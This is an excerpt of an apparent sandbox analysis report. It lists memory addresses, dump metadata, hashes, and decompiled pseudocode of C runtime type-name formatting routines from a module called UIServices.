                                                    0x7ffc23564609
                                                    0x7ffc2356460e
                                                    0x7ffc23564612
                                                    0x7ffc2356461e
                                                    0x7ffc23564621
                                                    0x7ffc23564631
                                                    0x7ffc23564638
                                                    0x7ffc2356463d
                                                    0x7ffc23564646
                                                    0x7ffc2356464f
                                                    0x7ffc23564655
                                                    0x7ffc2356465e
                                                    0x7ffc23564664
                                                    0x7ffc23564680
                                                    0x7ffc23564688
                                                    0x7ffc23564690
                                                    0x7ffc23564696
                                                    0x7ffc235646a3
                                                    0x7ffc235646b0
                                                    0x7ffc235646b7
                                                    0x7ffc235646bc
                                                    0x7ffc235646c1
                                                    0x7ffc235646c5
                                                    0x7ffc235646ca
                                                    0x7ffc235646ce
                                                    0x7ffc235646da
                                                    0x7ffc235646dd
                                                    0x7ffc235646e2
                                                    0x7ffc235646fc

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: abort$CreateFrameInfo
                                                    • String ID: csm
                                                    • API String ID: 2697087660-1018135373
                                                    • Opcode ID: c481a33ba08260d5865ea2b889ca60b5099e1cb82d5f69995c4f6df4fd766d99
                                                    • Instruction ID: e9ef9a47e0c1776cbcd2a7395c391d3e326e0baf139347aaf4dee32cf98ebb63
                                                    • Opcode Fuzzy Hash: c481a33ba08260d5865ea2b889ca60b5099e1cb82d5f69995c4f6df4fd766d99
                                                    • Instruction Fuzzy Hash: 4A516B72B1875587E620AB26E94026E77E4FB88B95F100174EB8D17B59CF3CE461CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 73%
                                                    			E00007FFC7FFC235697B4(void* __edx, void* __edi, void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __rdi, void* __rsi, void* __r8, long long _a8) {
                                                    				char _v24;
                                                    				intOrPtr _v32;
                                                    				char _v40;
                                                    				intOrPtr _v48;
                                                    				char _v56;
                                                    				intOrPtr _v72;
                                                    				void* _t33;
                                                    				char* _t42;
                                                    				long long _t45;
                                                    				intOrPtr* _t46;
                                                    				void* _t50;
                                                    				void* _t54;
                                                    				void* _t72;
                                                    				void* _t75;
                                                    
                                                    				_t72 = __r8;
                                                    				_t67 = __rsi;
                                                    				_t66 = __rdi;
                                                    				_t33 = __edx;
                                                    				_a8 = __rbx;
                                                    				_t50 = __rcx;
                                                    				E00007FFC7FFC23566D20(__rax, __rcx,  &_v56, __rdx, __rsi);
                                                    				_t42 =  *0x23574360; // 0x0
                                                    				if ( *_t42 == 0) goto 0x23569899;
                                                    				if ( *_t42 == 0x3f) goto 0x2356985e;
                                                    				if ( *_t42 == 0x58) goto 0x235697f9;
                                                    				_t54 = _t50;
                                                    				E00007FFC7FFC2356B428(_t33, __edi, _t42, _t50, _t54,  &_v56, __rdi, _t67, _t72, _t75);
                                                    				goto 0x235698b7;
                                                    				 *0x23574360 = _t42 + 1;
                                                    				if (_v56 != _t54) goto 0x23569835;
                                                    				_v32 = 4;
                                                    				_v40 = "void";
                                                    				asm("movaps xmm0, [ebp-0x20]");
                                                    				asm("movdqa [ebp-0x20], xmm0");
                                                    				E00007FFC7FFC23566CF4("void", _t50,  &_v40);
                                                    				goto 0x235698b7;
                                                    				_v32 = 5;
                                                    				_t45 = "void ";
                                                    				_v40 = _t45;
                                                    				asm("movaps xmm0, [ebp-0x20]");
                                                    				asm("movdqa [ebp-0x20], xmm0");
                                                    				E00007FFC7FFC23566CF4(_t45,  &_v24,  &_v40);
                                                    				goto 0x235698ab;
                                                    				_t46 = _t45 + 1;
                                                    				_v40 = _t45;
                                                    				_v32 = 0;
                                                    				_v72 = 0;
                                                    				 *0x23574360 = _t46;
                                                    				r8d = 0;
                                                    				E00007FFC7FFC23568F1C(__edi, _t50,  &_v24,  &_v56, _t66, _t67,  &_v40);
                                                    				_v56 =  *_t46;
                                                    				_v48 =  *((intOrPtr*)(_t46 + 8));
                                                    				goto 0x235697e8;
                                                    				_v32 = 0;
                                                    				_v40 = 0x23571ac0;
                                                    				return E00007FFC7FFC23566F74( &_v40, _t50,  &_v56);
                                                    			}

















                                                    0x7ffc235697b4
                                                    0x7ffc235697b4
                                                    0x7ffc235697b4
                                                    0x7ffc235697b4
                                                    0x7ffc235697b4
                                                    0x7ffc235697c1
                                                    0x7ffc235697c8
                                                    0x7ffc235697cd
                                                    0x7ffc235697d8
                                                    0x7ffc235697e1
                                                    0x7ffc235697e6
                                                    0x7ffc235697ec
                                                    0x7ffc235697ef
                                                    0x7ffc235697f4
                                                    0x7ffc23569800
                                                    0x7ffc2356980b
                                                    0x7ffc2356980d
                                                    0x7ffc2356981b
                                                    0x7ffc23569822
                                                    0x7ffc23569826
                                                    0x7ffc2356982b
                                                    0x7ffc23569830
                                                    0x7ffc23569835
                                                    0x7ffc2356983c
                                                    0x7ffc23569843
                                                    0x7ffc2356984b
                                                    0x7ffc2356984f
                                                    0x7ffc23569854
                                                    0x7ffc2356985c
                                                    0x7ffc2356985e
                                                    0x7ffc23569861
                                                    0x7ffc23569865
                                                    0x7ffc2356986c
                                                    0x7ffc23569878
                                                    0x7ffc2356987f
                                                    0x7ffc23569882
                                                    0x7ffc2356988a
                                                    0x7ffc23569891
                                                    0x7ffc23569894
                                                    0x7ffc235698a0
                                                    0x7ffc235698a3
                                                    0x7ffc235698c4

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: void$void
                                                    • API String ID: 2943138195-3746155364
                                                    • Opcode ID: a6f247cb1c09d34bdd6c4d34991a898b94f8244f30be933648e557672d6aca48
                                                    • Instruction ID: de0900d996b73e410fc7cc07c495eae988ad2c8475824d774d14ba46a8734ec4
                                                    • Opcode Fuzzy Hash: a6f247cb1c09d34bdd6c4d34991a898b94f8244f30be933648e557672d6aca48
                                                    • Instruction Fuzzy Hash: 98312062F18B6A98FB04CFA4EC410EC37B4FB48748B845176EE4E66B59DF389145CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: FileHeader$ExceptionRaise
                                                    • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                    • API String ID: 3685223789-3176238549
                                                    • Opcode ID: b812b1baf1a1dea540d51f0e271ba70b34f3a78c2d4c2ee043131516ce993cdf
                                                    • Instruction ID: 6154629a80b422200dd81ebdb12c5bca32bb700324619331f7542a6f89203409
                                                    • Opcode Fuzzy Hash: b812b1baf1a1dea540d51f0e271ba70b34f3a78c2d4c2ee043131516ce993cdf
                                                    • Instruction Fuzzy Hash: B8018471F69A5E91EE40DB10DC441786360FF50794F8054B1E64E17665EF6CE908CB20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFileHeaderRaise
                                                    • String ID: csm
                                                    • API String ID: 2573137834-1018135373
                                                    • Opcode ID: 36877a408567f611270a2d2a79b00ad06dd2bb25d704ef3ebaa1c47ff743a3c3
                                                    • Instruction ID: c8b2d36f00c4e6e8bd02a4a2b26e6ac0d7fe400823b3c1bb345ac27d2f7e5bff
                                                    • Opcode Fuzzy Hash: 36877a408567f611270a2d2a79b00ad06dd2bb25d704ef3ebaa1c47ff743a3c3
                                                    • Instruction Fuzzy Hash: 4F114C32A18B9582EB218F25E844269B7E1FB88B94F584270DECC17759DF3CD955CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 66%
                                                    			E00007FFC7FFC23C68898(void* __edx, void* __edi, long long __rbx, long long* __rcx, long long* __rdx, long long __rdi, long long __rsi, long long __r14, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                    				signed int _v16;
                                                    				signed int _v24;
                                                    				signed int _v32;
                                                    				char _v40;
                                                    				signed int _v48;
                                                    				signed int _v56;
                                                    				signed int _t103;
                                                    				void* _t104;
                                                    				signed int _t105;
                                                    				void* _t108;
                                                    				signed char _t114;
                                                    				signed int _t131;
                                                    				signed int _t134;
                                                    				void* _t137;
                                                    				signed int _t138;
                                                    				void* _t142;
                                                    				signed int _t143;
                                                    				void* _t146;
                                                    				signed int _t147;
                                                    				void* _t149;
                                                    				void* _t156;
                                                    				void* _t160;
                                                    				void* _t174;
                                                    				void* _t191;
                                                    				signed char* _t192;
                                                    				signed char* _t193;
                                                    				signed char* _t198;
                                                    				long long _t217;
                                                    				signed int _t226;
                                                    				signed long long* _t257;
                                                    				long long* _t270;
                                                    				long long _t272;
                                                    				void* _t274;
                                                    				void* _t277;
                                                    				signed char* _t280;
                                                    				signed long long* _t283;
                                                    				void* _t287;
                                                    				long long* _t289;
                                                    
                                                    				_t272 = __rsi;
                                                    				_t206 = __rbx;
                                                    				_t146 = __edi;
                                                    				_t142 = __edx;
                                                    				_t191 = _t277;
                                                    				 *((long long*)(_t191 + 8)) = __rbx;
                                                    				 *((long long*)(_t191 + 0x10)) = __rsi;
                                                    				 *((long long*)(_t191 + 0x18)) = __rdi;
                                                    				 *((long long*)(_t191 + 0x20)) = __r14;
                                                    				_t192 =  *0x23c74360; // 0x0
                                                    				_t289 = __rdx;
                                                    				_t270 = __rcx;
                                                    				_t147 =  *_t192 & 0x000000ff;
                                                    				if (sil == 0) goto 0x23c68d9e;
                                                    				_v56 = _v56 & 0x00000000;
                                                    				_t7 =  &(_t192[1]); // 0x1
                                                    				_t280 = _t7;
                                                    				_v48 = _v48 & 0x00000000;
                                                    				_t103 = _t147;
                                                    				 *0x23c74360 = _t280;
                                                    				_t149 = _t147 - 0x4e;
                                                    				if (_t149 > 0) goto 0x23c68964;
                                                    				if (_t149 == 0) goto 0x23c68cb8;
                                                    				if (_t103 - 0x43 < 0) goto 0x23c68c77;
                                                    				if (_t103 - 0x45 <= 0) goto 0x23c68955;
                                                    				if (_t103 - 0x47 <= 0) goto 0x23c6894c;
                                                    				if (_t103 - 0x49 <= 0) goto 0x23c6893d;
                                                    				if (_t103 - 0x4b <= 0) goto 0x23c6892e;
                                                    				if (_t103 != 0x4d) goto 0x23c68c77;
                                                    				r8d = 5;
                                                    				_t104 = E00007FFC7FFC23C66B04(_t192, __rbx,  &_v56, "float", __rcx, __rsi);
                                                    				goto 0x23c68ce0;
                                                    				r8d = 4;
                                                    				goto 0x23c68920;
                                                    				r8d = 3;
                                                    				goto 0x23c68920;
                                                    				goto 0x23c6891a;
                                                    				r8d = 4;
                                                    				goto 0x23c68920;
                                                    				_t156 = _t104 - 0x4f;
                                                    				if (_t156 == 0) goto 0x23c68ca2;
                                                    				if (_t156 <= 0) goto 0x23c68c77;
                                                    				if (_t104 - 0x53 <= 0) goto 0x23c68b74;
                                                    				if (_t104 == 0x58) goto 0x23c68b62;
                                                    				if (sil != 0x5f) goto 0x23c68c77;
                                                    				_t131 =  *_t280 & 0x000000ff;
                                                    				_t11 =  &(_t280[1]); // 0x2
                                                    				 *0x23c74360 = _t11;
                                                    				_t105 = _t131;
                                                    				_t160 = _t131 - 0x4e;
                                                    				if (_t160 > 0) goto 0x23c68aa0;
                                                    				if (_t160 == 0) goto 0x23c68a8e;
                                                    				if (_t105 - 0x47 > 0) goto 0x23c68a51;
                                                    				if (_t105 - 0x46 >= 0) goto 0x23c68a45;
                                                    				if (_t131 == 0) goto 0x23c68a27;
                                                    				if (_t105 == 0x24) goto 0x23c689e8;
                                                    				if (_t105 + 0xffffffbc - 1 > 0) goto 0x23c68b01;
                                                    				r8d = 6;
                                                    				goto 0x23c68b4d;
                                                    				_t193 = "__w64 ";
                                                    				_v16 = 6;
                                                    				_v24 = _t193;
                                                    				asm("movaps xmm0, [ebp-0x10]");
                                                    				asm("movdqa [ebp-0x10], xmm0");
                                                    				E00007FFC7FFC23C68898(_t142, _t146, _t206,  &_v40, "__int8", __rcx, _t272, __rdx);
                                                    				_t207 = _t193;
                                                    				_t108 = E00007FFC7FFC23C66CF4(_t193,  &_v56,  &_v24);
                                                    				goto 0x23c68db4;
                                                    				 *0x23c74360 = _t193;
                                                    				_v56 = 0x23c71ac0;
                                                    				_v48 = 1;
                                                    				goto 0x23c68cf5;
                                                    				goto 0x23c68b47;
                                                    				if (_t108 - 0x49 <= 0) goto 0x23c68a82;
                                                    				if (_t108 - 0x4b <= 0) goto 0x23c68a76;
                                                    				if (_t108 - 0x4d > 0) goto 0x23c68b01;
                                                    				r8d = 8;
                                                    				goto 0x23c68b4d;
                                                    				goto 0x23c68b47;
                                                    				goto 0x23c68b47;
                                                    				r8d = 4;
                                                    				goto 0x23c68b4d;
                                                    				if (_t108 == 0x4f) goto 0x23c68b5b;
                                                    				if (_t108 == 0x51) goto 0x23c68b40;
                                                    				if (_t108 == 0x52) goto 0x23c68b31;
                                                    				if (_t108 == 0x53) goto 0x23c68b22;
                                                    				if (_t108 == 0x55) goto 0x23c68b13;
                                                    				_t174 = _t108 - 0x57;
                                                    				if (_t174 == 0) goto 0x23c68b0a;
                                                    				if (_t174 <= 0) goto 0x23c68b01;
                                                    				if (_t131 - 0x59 > 0) goto 0x23c68b01;
                                                    				 *0x23c74360 = _t193 - 1;
                                                    				E00007FFC7FFC23C69D44(_t137, _t142, _t193,  &_v24, _t270, _t193, _t287);
                                                    				_t217 =  *0x23c71ac0;
                                                    				_t143 =  *0x7FFC23C71AC8;
                                                    				_v56 = _t217;
                                                    				_v48 = _t143;
                                                    				if (_t217 != 0) goto 0x23c68cf5;
                                                    				 *_t270 = _t217;
                                                    				 *(_t270 + 8) = _t143;
                                                    				goto 0x23c68dbc;
                                                    				goto 0x23c68b47;
                                                    				goto 0x23c68b47;
                                                    				r8d = 8;
                                                    				goto 0x23c68b4d;
                                                    				r8d = 8;
                                                    				goto 0x23c68b4d;
                                                    				r8d = 9;
                                                    				goto 0x23c68b4d;
                                                    				r8d = 7;
                                                    				E00007FFC7FFC23C66B04(0x23c71ac0, _t193,  &_v56, "char8_t", _t270, _t272);
                                                    				goto 0x23c68cf5;
                                                    				goto 0x23c68b77;
                                                    				r8d = 4;
                                                    				goto 0x23c68920;
                                                    				_v56 = _v56 & 0x00000000;
                                                    				_v48 = _v48 & 0x00000000;
                                                    				_t138 =  *(_t289 + 8);
                                                    				_v24 = "void";
                                                    				_v16 = _t138;
                                                    				if (2 != 0xfffffffe) goto 0x23c68bf2;
                                                    				_v16 = _t138 | 0x00000800;
                                                    				r9d = 0;
                                                    				E00007FFC7FFC23C6B8A8(_t143, _t146, _t193,  &_v40,  &_v56, _t270, _t272,  &_v24, _t274);
                                                    				if ((0x00000800 & _v32) != 0) goto 0x23c68be3;
                                                    				_v16 = 2;
                                                    				_v24 = 0x23c70ea0;
                                                    				_t257 =  &_v24;
                                                    				asm("movaps xmm0, [ebp-0x10]");
                                                    				asm("movdqa [ebp-0x10], xmm0");
                                                    				_t114 = E00007FFC7FFC23C66FF8(_t143, _t146, 0x23c70ea0, _t193,  &_v40, _t257, _t272);
                                                    				 *_t270 = _v40;
                                                    				 *(_t270 + 8) = _v32;
                                                    				goto 0x23c68dbc;
                                                    				if (_t257 != 0) goto 0x23c68c5c;
                                                    				_t134 = _t114 & 0x00000002;
                                                    				if ((_t114 & 0x00000001) == 0) goto 0x23c68c42;
                                                    				r8d = _t257 + 5;
                                                    				E00007FFC7FFC23C66B04(_v40, _t207,  &_v56, "const", _t270, _t272);
                                                    				if (_t134 == 0) goto 0x23c68c5c;
                                                    				_v32 = 9;
                                                    				_v40 = " volatile";
                                                    				asm("movaps xmm0, [ebp-0x20]");
                                                    				asm("movdqa [ebp-0x20], xmm0");
                                                    				E00007FFC7FFC23C66FF8(_t143, _t146, " volatile", _t207,  &_v56,  &_v40, _t272);
                                                    				goto 0x23c68c5c;
                                                    				if (_t134 == 0) goto 0x23c68c5c;
                                                    				r8d = 8;
                                                    				E00007FFC7FFC23C66B04(" volatile", _t207,  &_v56, "volatile", _t270, _t272);
                                                    				r9d = 1;
                                                    				_t283 =  &_v24;
                                                    				E00007FFC7FFC23C6B8A8(_t143, _t146, _t207, _t270,  &_v56, _t270, _t272, _t283);
                                                    				goto 0x23c68dbc;
                                                    				_t57 = _t283 - 1; // 0x0
                                                    				_t198 = _t57;
                                                    				 *0x23c74360 = _t198;
                                                    				E00007FFC7FFC23C69D44(_v32, _t143, _t207,  &_v24, _t270, _t283, _t287);
                                                    				_t226 =  *_t198;
                                                    				_v56 = _t226;
                                                    				_v48 = _t198[8];
                                                    				if (_t226 != 0) goto 0x23c68ce0;
                                                    				goto 0x23c68af6;
                                                    				r8d = 5;
                                                    				E00007FFC7FFC23C66B04(_t198, _t207,  &_v56, "long ", _t270, _t272);
                                                    				_v16 = 6;
                                                    				_v24 = "double";
                                                    				asm("movaps xmm0, [ebp-0x10]");
                                                    				asm("movdqa [ebp-0x10], xmm0");
                                                    				E00007FFC7FFC23C66FF8(_t198[8], _t146, "double", _t207,  &_v56,  &_v24, _t272);
                                                    				if (sil == 0x43) goto 0x23c68d12;
                                                    				_t67 = _t272 - 0x45; // -69
                                                    				if ((_t67 & 0x000000f9) == 0) goto 0x23c68d02;
                                                    				if (sil != 0x5f) goto 0x23c68d58;
                                                    				if (0xffffffffffffffbb - 8 > 0) goto 0x23c68d58;
                                                    				if (1 != 0) goto 0x23c68d58;
                                                    				_v16 = 9;
                                                    				goto 0x23c68d20;
                                                    				_v16 = 7;
                                                    				_v24 = "signed ";
                                                    				asm("movaps xmm0, [ebp-0x10]");
                                                    				asm("movdqa [ebp-0x10], xmm0");
                                                    				E00007FFC7FFC23C66CF4("signed ",  &_v40,  &_v24);
                                                    				E00007FFC7FFC23C66F74("signed ",  &_v24,  &_v56);
                                                    				_v56 = _v24;
                                                    				_v48 = _v16;
                                                    				if ( *_t289 == 0) goto 0x23c68d8f;
                                                    				_v24 = _v24 & 0x00000000;
                                                    				_v16 = _v16 & 0x00000000;
                                                    				E00007FFC7FFC23C68150(0x20, _v24, _t207,  &_v24);
                                                    				E00007FFC7FFC23C66F74( &_v24,  &_v40, _t289);
                                                    				E00007FFC7FFC23C67078(_v32,  &_v56,  &_v40, _t289);
                                                    				 *_t270 = _v56;
                                                    				 *(_t270 + 8) = _v48;
                                                    				goto 0x23c68dbc;
                                                    				_v16 = _v16 & 0x00000000;
                                                    				_v24 = 0x23c71ac0;
                                                    				return E00007FFC7FFC23C66F74( &_v24, _t270, _t289);
                                                    			}









































                                                    0x7ffc23c68898
                                                    0x7ffc23c68898
                                                    0x7ffc23c68898
                                                    0x7ffc23c68898
                                                    0x7ffc23c68898
                                                    0x7ffc23c6889b
                                                    0x7ffc23c6889f
                                                    0x7ffc23c688a3
                                                    0x7ffc23c688a7
                                                    0x7ffc23c688b3
                                                    0x7ffc23c688ba
                                                    0x7ffc23c688bd
                                                    0x7ffc23c688c0
                                                    0x7ffc23c688c6
                                                    0x7ffc23c688cc
                                                    0x7ffc23c688d1
                                                    0x7ffc23c688d1
                                                    0x7ffc23c688d5
                                                    0x7ffc23c688d9
                                                    0x7ffc23c688db
                                                    0x7ffc23c688e2
                                                    0x7ffc23c688e5
                                                    0x7ffc23c688e7
                                                    0x7ffc23c688f0
                                                    0x7ffc23c688f9
                                                    0x7ffc23c688fe
                                                    0x7ffc23c68903
                                                    0x7ffc23c68908
                                                    0x7ffc23c6890d
                                                    0x7ffc23c6891a
                                                    0x7ffc23c68924
                                                    0x7ffc23c68929
                                                    0x7ffc23c6892e
                                                    0x7ffc23c6893b
                                                    0x7ffc23c6893d
                                                    0x7ffc23c6894a
                                                    0x7ffc23c68953
                                                    0x7ffc23c68955
                                                    0x7ffc23c68962
                                                    0x7ffc23c68964
                                                    0x7ffc23c68967
                                                    0x7ffc23c6896d
                                                    0x7ffc23c68976
                                                    0x7ffc23c6897f
                                                    0x7ffc23c68989
                                                    0x7ffc23c6898f
                                                    0x7ffc23c68993
                                                    0x7ffc23c68997
                                                    0x7ffc23c6899e
                                                    0x7ffc23c689a0
                                                    0x7ffc23c689a3
                                                    0x7ffc23c689a9
                                                    0x7ffc23c689b2
                                                    0x7ffc23c689bb
                                                    0x7ffc23c689c3
                                                    0x7ffc23c689c8
                                                    0x7ffc23c689d0
                                                    0x7ffc23c689d6
                                                    0x7ffc23c689e3
                                                    0x7ffc23c689e8
                                                    0x7ffc23c689ef
                                                    0x7ffc23c689f6
                                                    0x7ffc23c689fe
                                                    0x7ffc23c68a02
                                                    0x7ffc23c68a07
                                                    0x7ffc23c68a10
                                                    0x7ffc23c68a17
                                                    0x7ffc23c68a22
                                                    0x7ffc23c68a2e
                                                    0x7ffc23c68a35
                                                    0x7ffc23c68a39
                                                    0x7ffc23c68a40
                                                    0x7ffc23c68a4c
                                                    0x7ffc23c68a54
                                                    0x7ffc23c68a59
                                                    0x7ffc23c68a5e
                                                    0x7ffc23c68a64
                                                    0x7ffc23c68a71
                                                    0x7ffc23c68a7d
                                                    0x7ffc23c68a89
                                                    0x7ffc23c68a8e
                                                    0x7ffc23c68a9b
                                                    0x7ffc23c68aa3
                                                    0x7ffc23c68aac
                                                    0x7ffc23c68ab5
                                                    0x7ffc23c68aba
                                                    0x7ffc23c68abf
                                                    0x7ffc23c68ac1
                                                    0x7ffc23c68ac4
                                                    0x7ffc23c68ac6
                                                    0x7ffc23c68acb
                                                    0x7ffc23c68ad0
                                                    0x7ffc23c68adb
                                                    0x7ffc23c68ae0
                                                    0x7ffc23c68ae3
                                                    0x7ffc23c68ae6
                                                    0x7ffc23c68aea
                                                    0x7ffc23c68af0
                                                    0x7ffc23c68af6
                                                    0x7ffc23c68af9
                                                    0x7ffc23c68afc
                                                    0x7ffc23c68b08
                                                    0x7ffc23c68b11
                                                    0x7ffc23c68b13
                                                    0x7ffc23c68b20
                                                    0x7ffc23c68b22
                                                    0x7ffc23c68b2f
                                                    0x7ffc23c68b31
                                                    0x7ffc23c68b3e
                                                    0x7ffc23c68b47
                                                    0x7ffc23c68b51
                                                    0x7ffc23c68b56
                                                    0x7ffc23c68b60
                                                    0x7ffc23c68b62
                                                    0x7ffc23c68b6f
                                                    0x7ffc23c68b77
                                                    0x7ffc23c68b7c
                                                    0x7ffc23c68b83
                                                    0x7ffc23c68b87
                                                    0x7ffc23c68b8b
                                                    0x7ffc23c68b91
                                                    0x7ffc23c68ba2
                                                    0x7ffc23c68ba5
                                                    0x7ffc23c68bac
                                                    0x7ffc23c68bb6
                                                    0x7ffc23c68bb8
                                                    0x7ffc23c68bc6
                                                    0x7ffc23c68bca
                                                    0x7ffc23c68bce
                                                    0x7ffc23c68bd6
                                                    0x7ffc23c68bdb
                                                    0x7ffc23c68be7
                                                    0x7ffc23c68bea
                                                    0x7ffc23c68bed
                                                    0x7ffc23c68bf5
                                                    0x7ffc23c68bf9
                                                    0x7ffc23c68bfe
                                                    0x7ffc23c68c00
                                                    0x7ffc23c68c0f
                                                    0x7ffc23c68c16
                                                    0x7ffc23c68c18
                                                    0x7ffc23c68c26
                                                    0x7ffc23c68c2e
                                                    0x7ffc23c68c36
                                                    0x7ffc23c68c3b
                                                    0x7ffc23c68c40
                                                    0x7ffc23c68c44
                                                    0x7ffc23c68c46
                                                    0x7ffc23c68c57
                                                    0x7ffc23c68c5c
                                                    0x7ffc23c68c62
                                                    0x7ffc23c68c6d
                                                    0x7ffc23c68c72
                                                    0x7ffc23c68c77
                                                    0x7ffc23c68c77
                                                    0x7ffc23c68c7f
                                                    0x7ffc23c68c86
                                                    0x7ffc23c68c8b
                                                    0x7ffc23c68c91
                                                    0x7ffc23c68c95
                                                    0x7ffc23c68c9b
                                                    0x7ffc23c68c9d
                                                    0x7ffc23c68ca2
                                                    0x7ffc23c68cb3
                                                    0x7ffc23c68cb8
                                                    0x7ffc23c68cc6
                                                    0x7ffc23c68cce
                                                    0x7ffc23c68cd6
                                                    0x7ffc23c68cdb
                                                    0x7ffc23c68ce4
                                                    0x7ffc23c68ce6
                                                    0x7ffc23c68ceb
                                                    0x7ffc23c68cf3
                                                    0x7ffc23c68cfb
                                                    0x7ffc23c68d00
                                                    0x7ffc23c68d09
                                                    0x7ffc23c68d10
                                                    0x7ffc23c68d19
                                                    0x7ffc23c68d20
                                                    0x7ffc23c68d28
                                                    0x7ffc23c68d30
                                                    0x7ffc23c68d35
                                                    0x7ffc23c68d45
                                                    0x7ffc23c68d4e
                                                    0x7ffc23c68d55
                                                    0x7ffc23c68d5c
                                                    0x7ffc23c68d5e
                                                    0x7ffc23c68d67
                                                    0x7ffc23c68d6d
                                                    0x7ffc23c68d7d
                                                    0x7ffc23c68d8a
                                                    0x7ffc23c68d93
                                                    0x7ffc23c68d99
                                                    0x7ffc23c68d9c
                                                    0x7ffc23c68d9e
                                                    0x7ffc23c68da9
                                                    0x7ffc23c68dd8

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $bool$char$char16_t$char32_t$char8_t$const$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
                                                    • API String ID: 2943138195-1201493255
                                                    • Opcode ID: 4b2c21490afed62d83a2dfa5dfe8f1ab37e6e916fa2cc5ad5efdca011254f1f8
                                                    • Instruction ID: 1169231db2d3cafd89b55f810f64858f7875728a8ef224502d5339fb388e48df
                                                    • Opcode Fuzzy Hash: 4b2c21490afed62d83a2dfa5dfe8f1ab37e6e916fa2cc5ad5efdca011254f1f8
                                                    • Instruction Fuzzy Hash: 58F14CA2F1C72A98FB108B58DC812FC27B4FB84748F5046B6CE1D66699DF3CA544CB61
                                                    Uniqueness

